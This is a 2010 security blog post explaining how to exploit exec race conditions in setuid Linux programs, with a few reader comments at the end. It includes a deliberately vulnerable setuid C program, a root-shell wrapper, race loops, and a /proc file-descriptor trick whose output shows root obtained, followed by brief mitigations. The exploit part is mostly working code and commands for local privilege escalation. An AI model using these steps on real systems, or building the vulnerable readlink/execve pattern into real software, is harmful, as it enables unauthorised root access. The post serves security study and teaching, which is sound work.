Saturday, November 06, 2010

Exec race condition exploitations

I recently learned a cool technique for exploiting exec race conditions. It was mentioned in a comment by Julien Tinnes about the 2009 pulseaudio vulnerability in Linux, and more recently by Tavis Ormandy (@taviso) about the GNU C library dynamic linker expanding $ORIGIN in setuid library search path vulnerability. I am sure that many people know this for ages, but still it was new to me and I thought it was worth a small post on it.

In short

Consider the pulseaudio case, which can be reduced to:
  • file is setuid
  • readlink("/proc/self/exe", buf, sizeof(buf))
  • later, execve(buf, .., ..)
We have a race condition between the moment the program is run (under the owner's uid), and the moment the symlink to the program is read via readlink() syscall and program executed again via execve() syscall.

This race condition can be exploited if you are able to change the value pointed by the symlink /proc/self/exe right after the program execution and before readlink(). You can do that by creating a hardlink to the program in a directory you own, then delete it and place your program within the race window. Indeed, if you use a symlink, execve() will resolve it before execution and /proc/self/exe would point to the actual program (that you cannot/do not want to delete).

Proof of concept

Consider the following vulnerable program:
#include <unistd.h>
int main(int argc, char **argv, char **envp)
  char buf[4096];
  /* do some stuff, and a check if we require new execution */
  if (argc < 2)
    if (readlink("/proc/self/exe", buf, sizeof(buf)) < 0) return 1;
    char *args[] = { buf, "1", 0 };
    if (execve(args[0], args, 0) < 0) return 1;
  /* do some stuff */
  return 0;
Make it owned by root and give it the setuid bit:
$ gcc -Wall -o vulnerable vulnerable.c
$ sudo chown root: vulnerable
$ sudo chmod u+s vulnerable
$ ls -l
total 12
-rwsr-xr-x 1 root   root   6961 Nov  1 03:38 vulnerable
-rw-r--r-- 1 stalkr stalkr  447 Nov  1 03:38 vulnerable.c

Exploit 1: classic race exploitation

For those where sh is linked to bash, we will need a small wrapper to give us euid (geteuid) as uid (setuid). Also, this wrapper will help in the classical exploitation of the race condition by exiting if it has not reached the target uid. Here is the wrapper:
#include <unistd.h>
int main()
  if (geteuid()!=0) exit(1);
  char *args[] = { "/bin/sh", 0 };
  return execve(args[0], args, 0);
$ gcc -Wall -o wrapper wrapper.c
Then open two shells. In the first shell, prepare to trigger the race condition by creating a hardlink to the vulnerable program, then place your program under the same filename (I use a hardlink too but it is not a requirement), and loop:
$ while :; do ln -f ./vulnerable poc; ln -f ./wrapper poc; done
In the second shell, just run the hardlink. We will use nice to lower the priority of the process and raise our chances for the race condition to be triggered:
$ while :; do nice -n 20 ./poc; done
Just wait and the shell should appear at some time, but it can take a long time.

To exploit this race reliably, we need to find a way to stop the execution of the process before its main(). That's the challenge Julien Tinnes gave to his readers, and I will repeat the two known solutions here.

Exploit 2: fill blocking pipes

I will just quote the answer comment by Julien Tinnes:

"So yeah, this is it, the LD_DEBUG trick still works. You set LD_DEBUG to a bogus value and then you exhaust a pipe like usual and dup2 it to the child's stderr. It solves the part where the parent has to wait for the child to be ready.
And to guarantee that the parent will not perform a certain action before the child is inside execve(), I used vfork().
So the LD_DEBUG trick + vfork() was our "old school" solution and Dividead was the first to find and report to us this solution (at least the first part).

Indeed there is a very good work by Dividead on his blog, with exploit code.

Exploit 3: use /proc file descriptors

Create the hardlink, then open a file descriptor in the current shell to it:
$ ln vulnerable poc
$ exec 3< ./poc
$ ls -l /proc/$$/fd/3
lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc
It is important to realize that from this point the program has not been started, we just have a file descriptor to the program, and a file descriptor has all information about owner and setuid bit.

Now we delete our hardlink to the setuid program:
$ rm -f poc
Now if you check the file descriptor, it should have appended to its destination " (deleted)" and the link is broken:
$ ls -l /proc/$$/fd/3
lr-x------ 1 stalkr stalkr 64 Nov  1 03:39 /proc/2074/fd/3 -> /home/stalkr/poc (deleted)
On some kernels it does not change the destination, you just see that the link is broken if you enable ls colors (green ok, red broken).

Then just place the program you want at this destination. Here I will just use a setuid(geteuid)+execve(/bin/sh) wrapper.
$ mv wrapper 'poc (deleted)'
On kernels where the fd symlink has not changed its destination, you just have to rename it to poc.

The final step is to execute the program. We do that by using shell built-in exec on the file descriptor and it has the effect of calling execve() on this file descriptor. But remember, this file descriptor has root owner and setuid bit, so it executes the vulnerable program (still on disk because it was a hardlink) with these properties. The vulnerable program then executes itself via /proc/self/exe which now points to our program, and we eventually get the euid root:
$ exec /proc/$$/fd/3
sh-4.1# id
uid=0(root) gid=1000(stalkr) groups=0(root),1000(stalkr)
Race won in one shot!

Update: on newer kernels, this exploitation technique is no longer usable because file is renamed as (deleted) /path/to/file.


I very much liked the last technique using /proc and file descriptor. I hope I did not say anything wrong, if so feel free to correct me.

About the mitigations, in addition to protecting your /tmp with nosuid or noexec mount options, you can consider having your setuid binaries on another filesystem, thus disallowing hardlinking - because hardlinks can only be on the same filesystem by definition.


  1. really nice!
    didn't know about such exec behaviour

  2. Great info!! Thanks for showme how race condition works =)